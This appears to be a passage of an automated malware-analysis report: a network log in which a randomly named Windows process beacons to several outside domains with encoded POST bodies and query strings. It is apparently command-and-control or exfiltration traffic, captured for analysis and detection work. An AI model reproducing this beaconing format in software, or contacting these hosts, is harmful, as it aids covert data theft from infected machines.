                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                11 | 192.168.2.6 | 49723 | 199.59.243.225 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:16:18.471956968 CEST | 1780 | OUT | POST /gy0x/ HTTP/1.1
                                Host: www.etrading.cloud
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.etrading.cloud
                                Referer: http://www.etrading.cloud/gy0x/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp= [TRUNCATED]
                                May 28, 2024 07:16:18.937002897 CEST | 1236 | IN | HTTP/1.1 200 OK
                                date: Tue, 28 May 2024 05:16:18 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1122
                                x-request-id: 6344225b-e056-44b8-a4bd-7f92c6979a31
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Wb4xNJH+XVDEMMsvtE913z5g8j2QB8BHLIuhffeOcUkeW80Ucfo8wUc1uMlAVTF/w8q8AR6m/uYMp3bIrG7D5A==
                                set-cookie: parking_session=6344225b-e056-44b8-a4bd-7f92c6979a31; expires=Tue, 28 May 2024 05:31:18 GMT; path=/
                                connection: close
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Wb4xNJH+XVDEMMsvtE913z5g8j2QB8BHLIuhffeOcUkeW80Ucfo8wUc1uMlAVTF/w8q8AR6m/uYMp3bIrG7D5A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                May 28, 2024 07:16:18.937027931 CEST | 575 | IN
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjM0NDIyNWItZTA1Ni00NGI4LWE0YmQtN2Y5MmM2OTc5YTMxIiwicGFnZV90aW1lIjoxNzE2ODczMz


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                12 | 192.168.2.6 | 49724 | 199.59.243.225 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:16:20.997710943 CEST | 478 | OUT | GET /gy0x/?5L0=2bCPy0&jTZPp=q3tVqQVST/58pKcjgu6vzl4r/mjx+/3v5p1oiGGfWC80c0QmTZc7sue0joIh5TaOhvctfB+I4hP6RP0S+zGuZLn5ZOGHWIzMGtqXZLXUxKwwwvK+KKFBFwNnv8XJAo+gt0xcEPY= HTTP/1.1
                                Host: www.etrading.cloud
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:16:21.480499983 CEST | 1236 | IN | HTTP/1.1 200 OK
                                date: Tue, 28 May 2024 05:16:21 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1498
                                x-request-id: 2c0692bb-ef8f-4120-8cb0-f1e7f41b0ff1
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_y3wu632yysqXHgvsccw/i7pzX3AotD5zqn/6huOnLzY3QyUTrx+V1SU4c0f9GtyCV9KCkWMBC6gF0XsBQ0EpyA==
                                set-cookie: parking_session=2c0692bb-ef8f-4120-8cb0-f1e7f41b0ff1; expires=Tue, 28 May 2024 05:31:21 GMT; path=/
                                connection: close
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_y3wu632yysqXHgvsccw/i7pzX3AotD5zqn/6huOnLzY3QyUTrx+V1SU4c0f9GtyCV9KCkWMBC6gF0XsBQ0EpyA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                May 28, 2024 07:16:21.480524063 CEST | 951 | IN
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmMwNjkyYmItZWY4Zi00MTIwLThjYjAtZjFlN2Y0MWIwZmYxIiwicGFnZV90aW1lIjoxNzE2ODczMz


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                13 | 192.168.2.6 | 49725 | 46.30.215.104 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:16:26.572362900 CEST | 755 | OUT | POST /5s1a/ HTTP/1.1
                                Host: www.ceo-retreats.co.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.ceo-retreats.co.uk
                                Referer: http://www.ceo-retreats.co.uk/5s1a/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=5hCa45MlRvFY29beHlUytZvjdPUV9EwSFoKopGzj3DGicCZYV1GTvasaEhdPni0FTz82PPfOICBtxbDLquWfu/tEyBoId+c4E6HDK/XyDQBC5XBlAkmF1QgFt55ZZ9zrO5rA7jw2yQAOOn0EEmzzpaIob6z1kDwsVhX+EvB7D3rR6kpnM1jjq/9b5S5IWmKvCFPr4R2GLG04
                                May 28, 2024 07:16:27.226155996 CEST | 451 | IN | HTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:16:27 GMT
                                Server: Apache
                                Content-Length: 196
                                Content-Type: text/html; charset=iso-8859-1
                                X-Onecom-Cluster-Name:
                                X-Varnish: 247437343
                                Age: 0
                                Via: 1.1 webcache2 (Varnish/trunk)
                                Connection: close
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                14 | 192.168.2.6 | 49726 | 46.30.215.104 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:16:29.112207890 CEST | 779 | OUT | POST /5s1a/ HTTP/1.1
                                Host: www.ceo-retreats.co.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.ceo-retreats.co.uk
                                Referer: http://www.ceo-retreats.co.uk/5s1a/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=5hCa45MlRvFY3dLeEH8yq5vkYPUV3kxVFoOopEfN3XqiciJYU3+TuasaDRdOpC0bTzg+PNLOIC9txazLqd+cvvtGmxoKQec4E6HDK8rYDRpC5HdlGFmGpAgas55Zd9z3O5qv7isPyWEOOlsEH3zwgaIuWayRpxFVMDj+a9lLCkzH2yo9QGjA4vdZ5Qh6WGKFAF3rqG6hEyRb/XTgqN6YyFFBkXsr2A+Z8w==
                                May 28, 2024 07:16:29.760127068 CEST | 451 | IN | HTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:16:29 GMT
                                Server: Apache
                                Content-Length: 196
                                Content-Type: text/html; charset=iso-8859-1
                                X-Onecom-Cluster-Name:
                                X-Varnish: 275448000
                                Age: 0
                                Via: 1.1 webcache2 (Varnish/trunk)
                                Connection: close
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                15 | 192.168.2.6 | 49727 | 46.30.215.104 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:16:31.647429943 CEST | 1792 | OUT | POST /5s1a/ HTTP/1.1
                                Host: www.ceo-retreats.co.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.ceo-retreats.co.uk
                                Referer: http://www.ceo-retreats.co.uk/5s1a/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp= [TRUNCATED]
                                May 28, 2024 07:16:32.310722113 CEST | 451 | IN | HTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:16:32 GMT
                                Server: Apache
                                Content-Length: 196
                                Content-Type: text/html; charset=iso-8859-1
                                X-Onecom-Cluster-Name:
                                X-Varnish: 229319986
                                Age: 0
                                Via: 1.1 webcache2 (Varnish/trunk)
                                Connection: close
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                16 | 192.168.2.6 | 49728 | 46.30.215.104 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:16:34.173558950 CEST | 482 | OUT | GET /5s1a/?jTZPp=0jq67MNPRq4g2+jjEmEFgdmxU9xn3lZuU82S2yL3jkWaNmBkMCuTzs1oACp+jQZQfFcSAdfVUnty14PGpb+cvJdHxRsAacQFCcCRXvTpLBxg40F9NDu9hRQlsdpJQY/jGZexiU8=&5L0=2bCPy0 HTTP/1.1
                                Host: www.ceo-retreats.co.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:16:34.811148882 CEST | 451 | IN | HTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:16:34 GMT
                                Server: Apache
                                Content-Length: 196
                                Content-Type: text/html; charset=iso-8859-1
                                X-Onecom-Cluster-Name:
                                X-Varnish: 273023697
                                Age: 0
                                Via: 1.1 webcache2 (Varnish/trunk)
                                Connection: close
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                17 | 192.168.2.6 | 49729 | 92.205.15.157 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:16:39.845788956 CEST | 755 | OUT | POST /ia1k/ HTTP/1.1
                                Host: www.mavonorm-global.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.mavonorm-global.uk
                                Referer: http://www.mavonorm-global.uk/ia1k/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=A5iX46c/5W7ER9QDbZGvGcVgZAjHhvDn2hlzqKSZDNt22Yio3Rf+V1rzqSoAXp+si5QeL2oUzJmd5jIKBfPTzTspObkNbRUivLAioSAjK02xsFnLTYF4cD2SHyml5CrFpqdIy1C1IdqkOmkbRzWWbYuLvHaF2YiKNFUe7JZKYvDEca6a8aYh5NsHQBExYssyEbky6XV7+HrN
                                May 28, 2024 07:16:40.598762035 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:16:40 GMT
                                Server: Apache
                                X-Powered-By: PHP/8.1.28
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Link: <https://mavonorm-global.uk/wp-json/>; rel="https://api.w.org/"
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Vary: Accept-Encoding
                                Content-Encoding: br
                                Content-Length: 10723
                                Content-Type: text/html; charset=UTF-8
                                May 28, 2024 07:16:40.598783970 CEST | 1236 | IN
                                May 28, 2024 07:16:40.598793983 CEST | 448 | IN
                                May 28, 2024 07:16:40.598800898 CEST | 1236 | IN
                                May 28, 2024 07:16:40.598808050 CEST | 1236 | IN
                                May 28, 2024 07:16:40.598818064 CEST | 1236 | IN
                                May 28, 2024 07:16:40.598830938 CEST | 1236 | IN
                                May 28, 2024 07:16:40.598841906 CEST | 1236 | IN
                                May 28, 2024 07:16:40.598853111 CEST | 1236 | IN
                                May 28, 2024 07:16:40.598866940 CEST | 809 | IN


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                18 | 192.168.2.6 | 49730 | 92.205.15.157 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:16:42.377017021 CEST | 779 | OUT | POST /ia1k/ HTTP/1.1
                                Host: www.mavonorm-global.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.mavonorm-global.uk
                                Referer: http://www.mavonorm-global.uk/ia1k/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=A5iX46c/5W7EXdgDIKuvOcV/FwjHvPCg2mtzqI+JC+J234So0Uz+S1rzzioBTp+3i4t9LzQUzJyd5i4KBIbUxDsrH7kPfRUivLAioWoZK0+xs0XLS697fD2VQCmlqSrBpqduywjoIfSkOigbWiWVSYuJrHbAz9eGIGpF46BKf979Zs7AgpYCrdMFQDcDYMsYGbcyoAZcxzOuZT4wd4k3fKK6RYWSaZW/+w==
                                May 28, 2024 07:16:43.217966080 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:16:42 GMT
                                Server: Apache
                                X-Powered-By: PHP/8.1.28
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Link: <https://mavonorm-global.uk/wp-json/>; rel="https://api.w.org/"
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Vary: Accept-Encoding
                                Content-Encoding: br
                                Content-Length: 10723
                                Content-Type: text/html; charset=UTF-8


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                19 | 192.168.2.6 | 49731 | 92.205.15.157 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:16:44.914307117 CEST | 1792 | OUT | POST /ia1k/ HTTP/1.1
                                Host: www.mavonorm-global.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.mavonorm-global.uk
                                Referer: http://www.mavonorm-global.uk/ia1k/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:16:45.672919989 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:16:45 GMT
                                Server: Apache
                                X-Powered-By: PHP/8.1.28
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Link: <https://mavonorm-global.uk/wp-json/>; rel="https://api.w.org/"
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Vary: Accept-Encoding
                                Content-Encoding: br
                                Content-Length: 10723
                                Content-Type: text/html; charset=UTF-8


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                20 | 192.168.2.6 | 49732 | 92.205.15.157 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:16:47.460633993 CEST | 482 | OUT | GET /ia1k/?5L0=2bCPy0&jTZPp=N7K37PwQwyq8WtMjD63BMb0ZEyGwsNHc8DxE6cCELPJHzMSs3RHBfzipjgIXVLm7nNAJX0ce6IW46RQAVIH59zJ0Pe4NazJJs+xz0T8fA0+K0n7VQeZLcDOWBXiB3y7ehLtrmgc= HTTP/1.1
                                Host: www.mavonorm-global.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:16:48.167815924 CEST | 556 | IN | HTTP/1.1 301 Moved Permanently
                                Date: Tue, 28 May 2024 05:16:48 GMT
                                Server: Apache
                                X-Powered-By: PHP/8.1.28
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                X-Redirect-By: WordPress
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Location: http://mavonorm-global.uk/ia1k/?5L0=2bCPy0&jTZPp=N7K37PwQwyq8WtMjD63BMb0ZEyGwsNHc8DxE6cCELPJHzMSs3RHBfzipjgIXVLm7nNAJX0ce6IW46RQAVIH59zJ0Pe4NazJJs+xz0T8fA0+K0n7VQeZLcDOWBXiB3y7ehLtrmgc=
                                Vary: Accept-Encoding
                                Content-Length: 0
                                Content-Type: text/html; charset=UTF-8


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                21 | 192.168.2.6 | 49733 | 76.223.67.189 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:16:53.334171057 CEST | 758 | OUT | POST /3gap/ HTTP/1.1
                                Host: www.adhdphotography.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.adhdphotography.com
                                Referer: http://www.adhdphotography.com/3gap/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=77/hlWsZ0PZgUVf6cAntS/b0LcntCdWPY6f1qRdCLm15Mu99nyON94jCTu1iYwaBAXeGV+n/Z24IsarF1xyEIBh2ND6CsOmlbfxw5a4IpuLCUOraIRZAn9nXjHYDHtikEdXR08akuJG+zO7TSzZshbIP/NHSNK+O+3Cp0ZRbQaMmt/gm9hNzT9uCCaKSAla9JoJbwBEp6i5P


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                22 | 192.168.2.6 | 49734 | 76.223.67.189 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:16:55.860764027 CEST | 782 | OUT | POST /3gap/ HTTP/1.1
                                Host: www.adhdphotography.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.adhdphotography.com
                                Referer: http://www.adhdphotography.com/3gap/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=77/hlWsZ0PZgV1v6aiPtFPb7OcntYtWLY6D1qTxSLVR5NLZ9k2iN+4jCbO1nWQa0AQX7V+L/Z28IsfHF1CqFKRh4Vz6Aiumlbfxw5ZEmpuDCV+baPAZfm9nYrnYDDtigEdX409HzuL++zK/TVhhry7IJ7NGtB/TZgWrb7vNpOqknsJh8hSNQBtOACYSgAFaXLoxbiWIO1WcsPWza5MU3DdoHfGL9p/NpNg==


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                23 | 192.168.2.6 | 49735 | 76.223.67.189 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:16:58.393496990 CEST | 1795 | OUT | POST /3gap/ HTTP/1.1
                                Host: www.adhdphotography.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.adhdphotography.com
                                Referer: http://www.adhdphotography.com/3gap/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                24 | 192.168.2.6 | 49736 | 76.223.67.189 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:17:00.926425934 CEST | 483 | OUT | GET /3gap/?jTZPp=25XBmjk0rqRaZkTkTD33T4OKGuWwQ/SEWL7mpnFDJER+MbRh/i2897KjaMR3WmWzMQOMItzOUFcJjK77+ET6PAxFDluhudTDf5JDha8/kN27L+7nUHVdmuvgnjQrBoWJDdvnsqo=&5L0=2bCPy0 HTTP/1.1
                                Host: www.adhdphotography.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:17:01.417190075 CEST | 408 | IN | HTTP/1.1 200 OK
                                Server: openresty
                                Date: Tue, 28 May 2024 05:17:01 GMT
                                Content-Type: text/html
                                Content-Length: 268
                                Connection: close
                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?jTZPp=25XBmjk0rqRaZkTkTD33T4OKGuWwQ/SEWL7mpnFDJER+MbRh/i2897KjaMR3WmWzMQOMItzOUFcJjK77+ET6PAxFDluhudTDf5JDha8/kN27L+7nUHVdmuvgnjQrBoWJDdvnsqo=&5L0=2bCPy0"}</script></head></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                25 | 192.168.2.6 | 49737 | 216.40.34.41 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:17:06.750149012 CEST | 764 | OUT | POST /dkdj/ HTTP/1.1
                                Host: www.allgiftedmalaysia.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.allgiftedmalaysia.com
                                Referer: http://www.allgiftedmalaysia.com/dkdj/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=Z0k7L0IoGcir9uOFH9GK1dj9Don4w/MiKrvcq9exUSVvQaR9hKyyUmSXZZgYA4IWoMW43uXLrxYUwidPrwsEdMk8N8YklRHeOaUbHINFdVn0OmnT8bdk1UFfNXxTET3vvWjMLMZ3/NdIDeEJkmK4u04IV/TjemvAlehuwR2D/dSr3b1jX0CXHc2PxTWj0T+YtjA03DmNx2Ab
                                May 28, 2024 07:17:07.266199112 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                content-type: text/html; charset=UTF-8
                                x-request-id: 72662986-fa05-4e92-a665-bfcf77779dda
                                x-runtime: 0.029467
                                content-length: 18254
                                connection: close
